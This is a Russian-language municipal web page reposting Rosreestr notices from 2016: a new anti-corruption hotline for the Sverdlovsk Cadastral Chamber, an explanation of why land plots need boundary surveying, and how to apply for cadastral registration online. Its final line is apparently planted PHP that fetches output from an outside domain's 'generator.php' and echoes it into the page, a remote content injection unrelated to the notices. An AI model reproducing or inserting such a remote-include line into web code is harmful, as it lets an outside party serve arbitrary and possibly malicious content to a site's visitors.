Регистрация нового пользоателя


Летний лагерь Салют 2010 год
Летний лагерь Салют 2010 год
Росреестр информирует

2016-12-19 12:40:11
Росреестр информирует

     В КАДАСТРОВОЙ ПАЛАТЕ ПО СВЕРДЛОВСКОЙ ОБЛАСТИ ИЗМЕНИЛСЯ НОМЕР «ТЕЛЕФОНА ДОВЕРИЯ»


     Теперь жители области могут оставлять обращения по вопросам противодействия коррупции по телефону8 (343) 295-07-01

     Кроме того, о фактах коррупции можно сообщить через официальный сайт филиала Кадастровой палаты по Свердловской области (http://kadastr.ru/site/fback/anticorrupt/form.htm) в разделе «Обратная связь»- «Противодействие коррупции», а также  направить письменное обращение по почте (620026, Екатеринбург, ул. Красноармейская 92 А) или на электронный адрес (fgu66@66.kadastr.ru).                            .
     Все полученные сообщения о коррупционных проявлениях регистрируются; по каждому, проводятся соответствующие проверки, а в случае подтверждения коррупционных нарушений — принимаются меры по их устранению.                                  .
     Филиал ФГБУ «ФКП Росреестра» по Свердловской области предупреждает заявителей о рисках использования незаконных посреднических услуг в сфере кадастрового учета. 

 

 

НЕОБХОДИМОСТЬ МЕЖЕВАНИЯ ЗЕМЕЛЬНЫХ УЧАСТКОВ

     Межевание – это комплекс работ по восстановлению, установлению и закреплению границ земельного участка, определение его площади и местоположения в соответствии с законом.

     Без межевания границы земельного участка не определены. Где он находится, как проходит граница достоверно не установлено. В такой ситуации участок может стать объектом спора с соседями, возможен самовольный захват земельного участка или его части.

     Земельные споры в основном происходят между владельцами смежных земельных участков. Причинами споров, как правило, становятся разногласия в установлении границ между их земельными участками.

Для того чтобы уточнить границы земельного участка, необходимо провести межевание. Данные работы осуществляют кадастровые инженеры, которые обладают правом осуществлять кадастровую деятельность, имеют техническую возможность и опыт работы. Только кадастровые инженеры могут провести точное измерение земельного участка и подготовить межевой план (документ, необходимый для представления в Кадастровую палату).

     Одним из важных этапов подготовки межевого плана является процедура согласования границ земельного участка с соседями.

     Акт согласования - документ, являющийся неотъемлемой частью межевого плана, в котором смежные землепользователи выражают согласие или несогласие с местоположением границы земельного участка. Законом установлено, что граница считается согласованной в том случае, если в акте согласования имеются личные подписи собственников смежных земельных участков, либо их законных представителей, так же в случае отсутствия писменных возражений о местоположении границ.

     Согласованные в законном порядке границы земельного участка являются гарантией того, что в случае нарушения границы, перемещении забора или захвате земли, границы будут восстановлены. В этом случае необходимо подготовить исковое заявление в суд о восстановлении границ земельного участка. В случае, если процедура межевания не была проведена в отношении земельного участка, то в такой ситуации будет очень сложно установить, где должна проходить граница.

     Споры об установлении границ земельного участка рассматриваются в судебном порядке, как правило, в подобных случаях назначается судебная экспертиза. Сэкономив сейчас на межевании, можно потерять больше в ходе судебного спора, так как стоимость землеустроительной экспертизы во много превышает стоимость процедуры межевания.

 

КАК ПОСТАВИТЬ НЕДВИЖИМОСТЬ НА КАДАСТРОВЫЙ УЧЕТ С ПОМОЩЬЮ ОФИЦИАЛЬНОГО САЙТА КАДАСТРОВОЙ ПАЛАТЫ

 

    При постановке на учет объекта недвижимости заявление о кадастровом учете и необходимые для кадастрового учета документы могут быть направлены в орган кадастрового учета заявителем или его представителем в форме электронных документов с помощью сервиса на сайте Кадастровой палаты (https://rosreestr.ru/wps/portal/cc_ib_GKU_request).                    .
    В форме-опросе сервиса уточните информацию об объекте, месте нахождения регистрируемого объекта и требуемую форму получения кадастрового паспорта. Уточните информацию о заявителе, заполнив соответствующие поля. Загрузите все документы, необходимые для получения услуги, подписанные электронной цифровой подписью. Проверьте введенные данные и уточните электронный адрес для получения информации о статусе заявления.

     Для формирования заявления заявителям необходимо иметь следующий набор документов:

1.     Для постановки на ГКУ земельного участка - межевой план.
Для постановки на ГКУ объекта капитального строительства - технический план в формате XML, подписанный электронной подписью.

2.     При подаче заявления представителем – образ документа, подтверждающего полномочия, подписанный электронной подписью.

     За постановку на государственный кадастровый учет объекта недвижимости  плата не взимается.




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>